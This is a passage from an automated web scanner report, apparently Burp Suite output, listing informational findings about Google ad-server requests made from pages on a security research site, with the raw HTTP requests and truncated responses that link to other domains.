P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 22:29:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DPCI%2Basv%2Bscanning%26adU%3Dwww.idera.com%26adT%3DFree%2BSQL%2BServer%2BTools%26adU%3DSchools.com/Security%26adT%3DSecurity%2BCertification%26gl%3DUS&amp;usg=AFQjCNEQ8WASRkg-PEoJl3ryHEwMkE0lHg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790849&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303772879505&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303772879506&frm=0&adk=1819763764&ga_vid=1746212215.1303772880&ga_sid=1303772880&ga_hid=1154711050&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1208&bih=981&eid=33895130&fu=0&ifi=1&dtd=7&xpc=rypndccjWT&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:07:49 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 16325

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.lynda.com%26adT%3DJavascript%2BTutorials%26adU%3Ddice.com/Telefonix%26adT%3DMechanical%2BEngineer%26adU%3Dwww.BasicFunder.com%26adT%3DNonprofit%2BDonor%2BSoftware%26gl%3DUS&amp;usg=AFQjCNGO0peJJJl6E1twMgaXws1gGbGXVw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.29. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759232&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741232531&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741232622&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=1953752540&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&eid=33895132&fu=0&ifi=1&dtd=160&xpc=Zp67Lq5gHf&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3DAntag.co.uk/Auto_Moto%26adT%3DAuto%2BMoto%26gl%3DUS&amp;usg=AFQjCNFLmqqweilSDGlL75ZPfwneIRZRLA" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.30. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759224&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741224908&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741224970&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=132012205&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=103&xpc=dKubZykpQN&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3Dwww.shipasi.net%26adT%3DWorldwide%2BAuto%2BShipping%26gl%3DUS&amp;usg=AFQjCNGXaMgiP48VAuDHxYijK6UMKa1kOQ" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.31. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303768860&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fdmcacom%2Freflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-ghdb-example-poc-report.html&dt=1303750860350&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303750860440&frm=0&adk=1607234649&ga_vid=1417703358.1303750860&ga_sid=1303750860&ga_hid=397059849&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=132&xpc=LLA46jxGco&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 17:00:49 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4498

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/dmcacom/reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEfzwd-5yV-1VGWoohppNPTaLc6eA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.32. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303791964&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303773963958&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303773964246&frm=0&adk=1819763764&ga_vid=2039443989.1303773964&ga_sid=1303773964&ga_hid=1809728729&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=965&eid=33895132&fu=0&ifi=1&dtd=383&xpc=WF7j6xYkT1&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:25:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13263

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNE4jQT7EkQ17Gdi49uSHYjKND7aqQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.33. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303760684&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742684517&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303742684539&frm=0&adk=1607234649&ga_vid=273394407.1303742685&ga_sid=1303742685&ga_hid=12397547&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=80&xpc=wTS936Gnpy&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4639

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGpHBaNIZ8uAAtlrAq_XZ6rgDf35A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.34. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756477&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738508150&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738508337&frm=0&adk=1819763764&ga_vid=462818616.1303738508&ga_sid=1303738508&ga_hid=1973000711&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=277&xpc=aKLTpShQKv&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12692

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BNetwork%2BScan%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26adU%3Dwww.clcillinois.edu%26adT%3DSr/Lead%2BWeb%2BDeveloper%26gl%3DUS&amp;usg=AFQjCNGPqnY5UG7u7Cc-bpkvGzBJ3JUqqA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.35. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303766370&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-dork-ghdb-example-poc-report-integritydefendercom.html&dt=1303748391860&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303748391866&frm=0&adk=1607234649&ga_vid=2120010390.1303748392&ga_sid=1303748392&ga_hid=922806058&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=103&xpc=2iZPipA0Fr&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 16:19:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4398

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-dork-ghdb-example-poc-report-integritydefendercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGvOHgDryY4ma36SKtfu7uf8QEJfw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.36. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303763078&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fxss-sqlinjection-httpinjection-ghdb-weak-configuration-vulnerable-hosts.html&dt=1303745076567&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303745078578&frm=0&adk=1607234649&ga_vid=1433948857.1303745080&ga_sid=1303745080&ga_hid=1973449266&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=5073&xpc=3JCPfJiNGG&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
